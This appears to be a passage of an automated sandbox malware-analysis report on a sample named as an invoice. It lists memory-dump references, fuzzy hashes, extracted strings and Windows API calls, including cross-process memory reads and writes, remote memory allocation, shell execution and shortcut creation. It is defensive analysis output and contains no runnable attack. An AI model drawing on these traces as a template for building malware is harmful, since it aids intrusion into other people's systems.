                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                              • String ID:
                              • API String ID: 3741023627-0
                              • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                              • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                              • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                              • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$Icon
                              • String ID:
                              • API String ID: 4023252218-0
                              • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                              • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                              • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                              • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                              APIs
                              • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: DeleteDestroyObject$IconMessageSendWindow
                              • String ID:
                              • API String ID: 1489400265-0
                              • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                              • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                              • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                              • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                              APIs
                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                              • DestroyWindow.USER32(?), ref: 00455728
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                              • String ID:
                              • API String ID: 1042038666-0
                              • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                              • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                              • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                              • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Path$ObjectStroke$DeleteFillSelect
                              • String ID:
                              • API String ID: 2625713937-0
                              • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                              • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                              • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                              • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                              APIs
                              • __getptd.LIBCMT ref: 0041780F
                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                              • __getptd.LIBCMT ref: 00417826
                              • __amsg_exit.LIBCMT ref: 00417834
                              • __lock.LIBCMT ref: 00417844
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                              • String ID:
                              • API String ID: 938513278-0
                              • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                              • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                              • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                              • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                              APIs
                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                              • ExitThread.KERNEL32 ref: 00413D4E
                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                              • __freefls@4.LIBCMT ref: 00413D74
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                              • String ID:
                              • API String ID: 2403457894-0
                              • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                              • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                              • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                              • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                              APIs
                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                              • ExitThread.KERNEL32 ref: 004151ED
                              • __freefls@4.LIBCMT ref: 00415209
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                              • String ID:
                              • API String ID: 4247068974-0
                              • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                              • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                              • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                              • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID: )$U$\
                              • API String ID: 0-3705770531
                              • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                              • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                              • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                              • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                              APIs
                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                              • CoInitialize.OLE32(00000000), ref: 0046E505
                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                              • CoUninitialize.OLE32 ref: 0046E53D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                              • String ID: .lnk
                              • API String ID: 886957087-24824748
                              • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                              • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                              • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                              • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                              • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                              • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                              • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                              • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                              • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                              • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                              • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                              • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                              • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                              Strings
                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                              • API String ID: 708495834-557222456
                              • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                              • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                              • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                              • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                              APIs
                                • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                              • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                              • String ID: @
                              • API String ID: 4150878124-2766056989
                              • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                              • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                              • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                              • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \$]$h
                              • API String ID: 4104443479-3262404753
                              • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                              • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                              • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                              • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                              APIs
                              • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • CloseHandle.KERNEL32(?), ref: 00457E09
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
